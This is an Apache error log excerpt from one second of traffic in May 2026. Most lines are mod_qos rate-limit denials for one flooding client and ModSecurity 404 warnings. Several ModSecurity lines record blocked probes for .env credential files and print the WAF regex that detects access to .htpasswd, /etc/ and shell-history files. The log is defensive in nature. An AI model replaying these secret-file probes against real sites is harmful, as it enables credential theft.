[Tue May 26 19:54:50.912336 2026] [qos:error] [pid 93868:tid 94306] [client 45.148.10.120:49360] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMkqK9k_ZUB2Vp25MHwAAAb8
[Tue May 26 19:54:50.913650 2026] [qos:error] [pid 86490:tid 86663] [client 45.148.10.120:34924] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMlZMwN0DpLVWo6LHHQAAALA
[Tue May 26 19:54:50.916930 2026] [qos:error] [pid 86490:tid 86670] [client 45.148.10.120:59990] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMlZMwN0DpLVWo6LHHgAAALc
[Tue May 26 19:54:50.918082 2026] [qos:error] [pid 93868:tid 94317] [client 45.148.10.120:60084] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMkqK9k_ZUB2Vp25MIAAAAco
[Tue May 26 19:54:50.920383 2026] [qos:error] [pid 86490:tid 86647] [client 45.148.10.120:35222] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtMlZMwN0DpLVWo6LHHwAAAKA
[Tue May 26 19:54:50.945486 2026] [security2:error] [pid 93576:tid 93769] [client 185.177.72.53:50940] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/nuxt-app/backend/.env"] [unique_id "ahWtMmDRMqfxdEDkoszT5gAAADk"]
[Tue May 26 19:54:51.119521 2026] [qos:error] [pid 86490:tid 86717] [client 45.148.10.120:56888] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtM1ZMwN0DpLVWo6LHIAAAAOY
[Tue May 26 19:54:51.119577 2026] [qos:error] [pid 93868:tid 94294] [client 45.148.10.120:60084] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtM0qK9k_ZUB2Vp25MIQAAAbM
[Tue May 26 19:54:51.120279 2026] [qos:error] [pid 86490:tid 86636] [client 45.148.10.120:59990] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtM1ZMwN0DpLVWo6LHIQAAAJU
[Tue May 26 19:54:51.120762 2026] [qos:error] [pid 86490:tid 86629] [client 45.148.10.120:35222] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtM1ZMwN0DpLVWo6LHIgAAAI4
[Tue May 26 19:54:51.121387 2026] [qos:error] [pid 93868:tid 94273] [client 45.148.10.120:49408] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtM0qK9k_ZUB2Vp25MIgAAAZ4
[Tue May 26 19:54:51.122516 2026] [qos:error] [pid 93868:tid 94280] [client 45.148.10.120:49360] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtM0qK9k_ZUB2Vp25MIwAAAaU
[Tue May 26 19:54:51.122701 2026] [qos:error] [pid 86490:tid 86638] [client 45.148.10.120:35060] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtM1ZMwN0DpLVWo6LHIwAAAJc
[Tue May 26 19:54:51.122831 2026] [qos:error] [pid 93868:tid 94266] [client 45.148.10.120:56914] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtM0qK9k_ZUB2Vp25MJAAAAZc
[Tue May 26 19:54:51.122889 2026] [qos:error] [pid 93576:tid 93761] [client 45.148.10.120:49374] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtM2DRMqfxdEDkoszT6AAAADE
[Tue May 26 19:54:51.125432 2026] [qos:error] [pid 86490:tid 86712] [client 45.148.10.120:34924] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtM1ZMwN0DpLVWo6LHJAAAAOE
[Tue May 26 19:54:51.268337 2026] [qos:error] [pid 93868:tid 94383] [client 45.148.10.120:60084] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtM0qK9k_ZUB2Vp25MJQAAAgw
[Tue May 26 19:54:51.269672 2026] [qos:error] [pid 86490:tid 86686] [client 45.148.10.120:59990] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtM1ZMwN0DpLVWo6LHKgAAAMc
[Tue May 26 19:54:51.270128 2026] [qos:error] [pid 86490:tid 86714] [client 45.148.10.120:56888] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtM1ZMwN0DpLVWo6LHKwAAAOM
[Tue May 26 19:54:51.271195 2026] [qos:error] [pid 86490:tid 86721] [client 45.148.10.120:35222] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtM1ZMwN0DpLVWo6LHLAAAAOo
[Tue May 26 19:54:51.272981 2026] [qos:error] [pid 93868:tid 94335] [client 45.148.10.120:49408] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtM0qK9k_ZUB2Vp25MJgAAAdw
[Tue May 26 19:54:51.275671 2026] [qos:error] [pid 86490:tid 86702] [client 45.148.10.120:35060] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtM1ZMwN0DpLVWo6LHLQAAANc
[Tue May 26 19:54:51.277809 2026] [qos:error] [pid 86490:tid 86632] [client 45.148.10.120:34924] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtM1ZMwN0DpLVWo6LHLgAAAJE
[Tue May 26 19:54:51.278077 2026] [qos:error] [pid 93868:tid 94361] [client 45.148.10.120:49360] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtM0qK9k_ZUB2Vp25MJwAAAfY
[Tue May 26 19:54:51.278717 2026] [qos:error] [pid 93868:tid 94373] [client 45.148.10.120:56914] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtM0qK9k_ZUB2Vp25MKAAAAgI
[Tue May 26 19:54:51.279030 2026] [qos:error] [pid 93576:tid 93819] [client 45.148.10.120:49374] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtM2DRMqfxdEDkoszT6gAAAGs
[Tue May 26 19:54:51.281445 2026] [security2:error] [pid 93576:tid 93763] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMWDRMqfxdEDkoszTsgAAADM"]
[Tue May 26 19:54:51.282244 2026] [security2:error] [pid 93576:tid 93753] [client 185.177.72.53:50940] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/facebook-bot/.env"] [unique_id "ahWtM2DRMqfxdEDkoszT6wAAACk"]
[Tue May 26 19:54:51.286048 2026] [security2:error] [pid 93576:tid 93746] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMWDRMqfxdEDkoszTrwAAACI"]
[Tue May 26 19:54:51.286250 2026] [security2:error] [pid 93868:tid 94267] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMUqK9k_ZUB2Vp25L2gAAAZg"]
[Tue May 26 19:54:51.287063 2026] [security2:error] [pid 86490:tid 86716] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMFZMwN0DpLVWo6LGTAAAAOU"]
[Tue May 26 19:54:51.294337 2026] [security2:error] [pid 93868:tid 94355] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMUqK9k_ZUB2Vp25L1QAAAfA"]
[Tue May 26 19:54:51.309913 2026] [security2:error] [pid 93868:tid 94275] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMUqK9k_ZUB2Vp25L4wAAAaA"]
[Tue May 26 19:54:51.319920 2026] [security2:error] [pid 93576:tid 93757] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMWDRMqfxdEDkoszTsQAAAC0"]
[Tue May 26 19:54:51.326363 2026] [security2:error] [pid 86490:tid 86685] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMVZMwN0DpLVWo6LGnAAAAMY"]
[Tue May 26 19:54:51.327111 2026] [security2:error] [pid 93576:tid 93811] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMWDRMqfxdEDkoszTrAAAAGM"]
[Tue May 26 19:54:51.331293 2026] [security2:error] [pid 93868:tid 94314] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMUqK9k_ZUB2Vp25L5gAAAcc"]
[Tue May 26 19:54:51.335062 2026] [security2:error] [pid 93868:tid 94265] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMUqK9k_ZUB2Vp25L5QAAAZY"]
[Tue May 26 19:54:51.335749 2026] [security2:error] [pid 93868:tid 94382] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMUqK9k_ZUB2Vp25L5AAAAgs"]
[Tue May 26 19:54:51.342165 2026] [security2:error] [pid 86490:tid 86626] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMVZMwN0DpLVWo6LGnwAAAIs"]
[Tue May 26 19:54:51.342421 2026] [security2:error] [pid 93576:tid 93818] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMmDRMqfxdEDkoszTygAAAGo"]
[Tue May 26 19:54:51.348108 2026] [security2:error] [pid 93576:tid 93804] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMWDRMqfxdEDkoszTtgAAAFw"]
[Tue May 26 19:54:51.348933 2026] [security2:error] [pid 93868:tid 94368] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMUqK9k_ZUB2Vp25L6QAAAf0"]
[Tue May 26 19:54:51.355481 2026] [security2:error] [pid 86490:tid 86736] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMlZMwN0DpLVWo6LG0QAAAPk"]
[Tue May 26 19:54:51.357677 2026] [security2:error] [pid 86490:tid 86664] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMVZMwN0DpLVWo6LGogAAALE"]
[Tue May 26 19:54:51.366796 2026] [security2:error] [pid 93868:tid 94370] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMUqK9k_ZUB2Vp25L5wAAAf8"]
[Tue May 26 19:54:51.377267 2026] [security2:error] [pid 86490:tid 86659] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMlZMwN0DpLVWo6LG0gAAAKw"]
[Tue May 26 19:54:51.381614 2026] [security2:error] [pid 93868:tid 94302] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMkqK9k_ZUB2Vp25L-gAAAbs"]
[Tue May 26 19:54:51.385867 2026] [security2:error] [pid 93868:tid 94315] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMkqK9k_ZUB2Vp25L9wAAAcg"]
[Tue May 26 19:54:51.398368 2026] [security2:error] [pid 86490:tid 86621] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMlZMwN0DpLVWo6LG7wAAAIY"]
[Tue May 26 19:54:51.407944 2026] [security2:error] [pid 86490:tid 86635] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMlZMwN0DpLVWo6LG2AAAAJQ"]
[Tue May 26 19:54:51.408247 2026] [security2:error] [pid 86490:tid 86627] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMlZMwN0DpLVWo6LG3AAAAIw"]
[Tue May 26 19:54:51.413596 2026] [security2:error] [pid 93868:tid 94330] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMkqK9k_ZUB2Vp25L_gAAAdc"]
[Tue May 26 19:54:51.430424 2026] [security2:error] [pid 86490:tid 86655] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMlZMwN0DpLVWo6LG7gAAAKg"]
[Tue May 26 19:54:51.449383 2026] [security2:error] [pid 93868:tid 94337] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMkqK9k_ZUB2Vp25L-QAAAd4"]
[Tue May 26 19:54:51.450361 2026] [security2:error] [pid 93868:tid 94332] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMkqK9k_ZUB2Vp25L_QAAAdk"]
[Tue May 26 19:54:51.452003 2026] [security2:error] [pid 93576:tid 93809] [client 185.177.72.53:50940] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/travel-app/client/.env"] [unique_id "ahWtM2DRMqfxdEDkoszT-wAAAGE"]
[Tue May 26 19:54:51.454466 2026] [security2:error] [pid 86490:tid 86745] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtMlZMwN0DpLVWo6LG9AAAAQI"]
[Tue May 26 19:54:51.557073 2026] [qos:error] [pid 86490:tid 86665] [client 45.148.10.120:34862] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtM1ZMwN0DpLVWo6LHTQAAALI
[Tue May 26 19:54:51.558767 2026] [qos:error] [pid 93576:tid 93760] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtM2DRMqfxdEDkoszUEAAAADA
[Tue May 26 19:54:51.559778 2026] [qos:error] [pid 93868:tid 94282] [client 45.148.10.120:49478] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtM0qK9k_ZUB2Vp25MSwAAAac
[Tue May 26 19:54:51.605362 2026] [qos:error] [pid 93576:tid 93720] [client 45.148.10.120:49448] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtM2DRMqfxdEDkoszUEgAAAAg
[Tue May 26 19:54:51.609201 2026] [qos:error] [pid 86490:tid 86667] [client 45.148.10.120:60088] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtM1ZMwN0DpLVWo6LHUgAAALQ
[Tue May 26 19:54:51.612317 2026] [qos:error] [pid 86490:tid 86670] [client 45.148.10.120:34780] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtM1ZMwN0DpLVWo6LHVAAAALc
[Tue May 26 19:54:51.612986 2026] [qos:error] [pid 86490:tid 86652] [client 45.148.10.120:34806] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtM1ZMwN0DpLVWo6LHVQAAAKU
[Tue May 26 19:54:51.707820 2026] [qos:error] [pid 93868:tid 94297] [client 45.148.10.120:60112] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtM0qK9k_ZUB2Vp25MTQAAAbY
[Tue May 26 19:54:51.709064 2026] [qos:error] [pid 93868:tid 94364] [client 45.148.10.120:49478] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtM0qK9k_ZUB2Vp25MTgAAAfk
[Tue May 26 19:54:51.709423 2026] [qos:error] [pid 86490:tid 86653] [client 45.148.10.120:34862] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtM1ZMwN0DpLVWo6LHVwAAAKY
[Tue May 26 19:54:51.711166 2026] [qos:error] [pid 86490:tid 86664] [client 45.148.10.120:35144] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtM1ZMwN0DpLVWo6LHWAAAALE
[Tue May 26 19:54:51.728603 2026] [qos:error] [pid 86490:tid 86631] [client 45.148.10.120:60128] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtM1ZMwN0DpLVWo6LHWgAAAJA
[Tue May 26 19:54:51.740096 2026] [qos:error] [pid 86490:tid 86711] [client 45.148.10.120:60140] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtM1ZMwN0DpLVWo6LHXAAAAOA
[Tue May 26 19:54:51.756416 2026] [qos:error] [pid 93576:tid 93822] [client 45.148.10.120:49448] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtM2DRMqfxdEDkoszUFAAAAG4
[Tue May 26 19:54:51.759581 2026] [qos:error] [pid 86490:tid 86648] [client 45.148.10.120:60088] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtM1ZMwN0DpLVWo6LHXgAAAKE
[Tue May 26 19:54:51.762166 2026] [qos:error] [pid 86490:tid 86623] [client 45.148.10.120:34806] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtM1ZMwN0DpLVWo6LHXwAAAIg
[Tue May 26 19:54:51.859123 2026] [qos:error] [pid 93868:tid 94357] [client 45.148.10.120:49478] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtM0qK9k_ZUB2Vp25MTwAAAfI
[Tue May 26 19:54:51.860379 2026] [qos:error] [pid 93868:tid 94277] [client 45.148.10.120:60112] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtM0qK9k_ZUB2Vp25MUAAAAaI
[Tue May 26 19:54:51.862300 2026] [qos:error] [pid 86490:tid 86705] [client 45.148.10.120:34862] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtM1ZMwN0DpLVWo6LHYQAAANo
[Tue May 26 19:54:51.867367 2026] [qos:error] [pid 86490:tid 86740] [client 45.148.10.120:35144] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtM1ZMwN0DpLVWo6LHYgAAAP0
[Tue May 26 19:54:51.881423 2026] [qos:error] [pid 86490:tid 86720] [client 45.148.10.120:60128] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtM1ZMwN0DpLVWo6LHYwAAAOk
[Tue May 26 19:54:51.891892 2026] [qos:error] [pid 86490:tid 86635] [client 45.148.10.120:60140] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtM1ZMwN0DpLVWo6LHZAAAAJQ
[Tue May 26 19:54:51.910003 2026] [qos:error] [pid 86490:tid 86688] [client 45.148.10.120:60088] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtM1ZMwN0DpLVWo6LHZQAAAMk
[Tue May 26 19:54:51.916705 2026] [qos:error] [pid 93576:tid 93803] [client 45.148.10.120:49448] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtM2DRMqfxdEDkoszUGAAAAFs
[Tue May 26 19:54:51.921422 2026] [qos:error] [pid 86490:tid 86627] [client 45.148.10.120:34806] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtM1ZMwN0DpLVWo6LHZgAAAIw
[Tue May 26 19:54:52.050523 2026] [security2:error] [pid 86490:tid 86625] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtM1ZMwN0DpLVWo6LHVgAAAIo"]
[Tue May 26 19:54:52.064817 2026] [qos:error] [pid 93868:tid 94264] [client 45.148.10.120:49478] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNEqK9k_ZUB2Vp25MUwAAAZU
[Tue May 26 19:54:52.065189 2026] [qos:error] [pid 86490:tid 86686] [client 45.148.10.120:60128] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNFZMwN0DpLVWo6LHawAAAMc
[Tue May 26 19:54:52.068195 2026] [qos:error] [pid 86490:tid 86745] [client 45.148.10.120:60088] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNFZMwN0DpLVWo6LHbAAAAQI
[Tue May 26 19:54:52.068608 2026] [qos:error] [pid 86490:tid 86633] [client 45.148.10.120:34862] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtNFZMwN0DpLVWo6LHbQAAAJI
[Tue May 26 19:54:52.068692 2026] [qos:error] [pid 93868:tid 94262] [client 45.148.10.120:60112] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtNEqK9k_ZUB2Vp25MVAAAAZM
